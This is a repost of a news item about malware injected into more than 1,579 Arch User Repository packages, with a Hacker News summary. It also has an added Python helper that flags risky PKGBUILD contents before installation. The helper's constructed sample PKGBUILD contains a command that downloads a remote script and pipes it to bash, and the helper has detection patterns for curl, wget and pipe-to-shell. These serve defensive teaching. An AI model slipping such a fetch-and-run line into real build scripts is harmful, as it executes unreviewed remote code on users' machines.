Arch Linux Now Believes Malware Incident Under Control: More Than 1,500 Packages

Original link: https://www.phoronix.com/news/Arch-Linux-AUR-More-Than-1500

The Arch Linux user repository (AUR) recently suffered a major security incident in which a large number of user-contributed packages were injected with malware. Initial reports estimated that about 400 packages were infected, but as the situation developed the number of affected packages rose rapidly, eventually exceeding 1,500. Arch Linux developers have stepped in and deleted all confirmed malicious commits. However, the official update notes that the final count of 1,579 may still be incomplete, since it only covers a list of "many (but not all)" of the compromised packages. The incident highlights the inherent risk of relying on community-maintained repositories and is a stern reminder to users to remain cautious when installing software from untrusted sources.

The recent malware incident in Arch Linux is reported to be under control. The breach was confined to the Arch User Repository (AUR), a community-driven platform where software can be published without formal review. The discussion on Hacker News stressed that the AUR is by nature a "free and open" platform and has always reminded users to inspect package contents before installing. Commenters suggested that users can reduce this kind of risk by using command-line tools such as `rua` to inspect packages before installation, keeping dependencies minimal, and exercising caution when performing sensitive operations such as bank transfers. The incident is another reminder that vigilance is essential when installing third-party software from unvetted sources.
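As an added example (not from the article, from Arch, or from `rua`), a small Python helper that surfaces the parts of an AUR PKGBUILD a user should read before running makepkg: every source entry and its host, sources whose checksum is SKIP, and build-stage lines that fetch from the network or pipe into a shell. The sample PKGBUILD, its package name and its hostnames are constructed for the demo.

```python
"""Pre-install review of an AUR PKGBUILD (added example with a constructed sample):
lists sources and hosts, flags SKIP checksums and network-fetching build lines."""
import re

# Constructed sample PKGBUILD: package() runs an undeclared download piped to bash,
# and the second source is fetched with its checksum set to SKIP.
SAMPLE_PKGBUILD = r"""
pkgname=example-tool
pkgver=1.2.0
source=("https://github.com/example/example-tool/archive/v${pkgver}.tar.gz"
        "extra-setup.sh::https://files.example.invalid/setup.sh")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000'
            'SKIP')
package() {
    cd "$pkgname-$pkgver"
    make DESTDIR="$pkgdir" install
    curl -s https://files.example.invalid/post.sh | bash
}
"""

NET_FETCH = re.compile(r'\b(curl|wget|git\s+clone|pip\s+install)\b')
PIPE_TO_SHELL = re.compile(r'\|\s*(ba|z|da)?sh\b')
FUNC_BODY = re.compile(r'^(\w+)\(\)\s*\{(.*?)^\}', re.S | re.M)


def parse_array(text, name):
    """Return the quoted items of a bash array such as source=(...)."""
    m = re.search(rf'^{name}=\((.*?)\)', text, re.S | re.M)
    return re.findall(r"""["']([^"']+)["']""", m.group(1)) if m else []


def review_pkgbuild(text):
    """Return the findings a reviewer should read before running makepkg -si."""
    sources = parse_array(text, 'source')
    # makepkg accepts several checksum arrays; use the first one present.
    sums = next((a for a in (parse_array(text, n) for n in
                 ('sha256sums', 'sha512sums', 'b2sums', 'md5sums')) if a), [])
    unverified = [s for s, c in zip(sources, sums) if c.upper() == 'SKIP']
    hosts = sorted({m.group(1) for m in
                    (re.search(r'https?://([^/]+)', s) for s in sources) if m})
    risky = [(fn, line.strip()) for fn, body in FUNC_BODY.findall(text)
             for line in body.splitlines()
             if NET_FETCH.search(line) or PIPE_TO_SHELL.search(line)]
    return {'sources': sources, 'hosts': hosts,
            'unverified': unverified, 'risky_lines': risky}


if __name__ == '__main__':
    for key, val in review_pkgbuild(SAMPLE_PKGBUILD).items():
        print(f'{key}: {val}')
```

A real review would also diff the PKGBUILD against the previous AUR commit and read every file the package ships, which this helper does not replace.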

Original article
The day started out with Arch Linux's AUR user-contributed repository seeing more than 400 packages compromised with malware. Now, at the end of the day, they believe all affected commits have been addressed. But it ended up being more than 1,500 affected packages.

It was bad enough finding out that more than 400 AUR packages for Arch Linux users had been infected with malware, but that number rose to around 900 a few hours ago and has now ended up at more than 1,500 user-contributed packages.

In an update a few hours ago, it was believed around 900 packages were infected by malware in this week's incident.

As of writing, the last message in the thread on this security incident notes that Arch Linux developers have deleted all the malicious commits they are aware of. Cited was this list that puts the number of malware-affected packages at 1,579! Tons of software in this user-maintained Arch Linux user repository was impacted by this nasty security incident.

Even at 1,579 packages listed, that final update noted, it's a "list containing many (but not all) of the affected packages". Ouch.
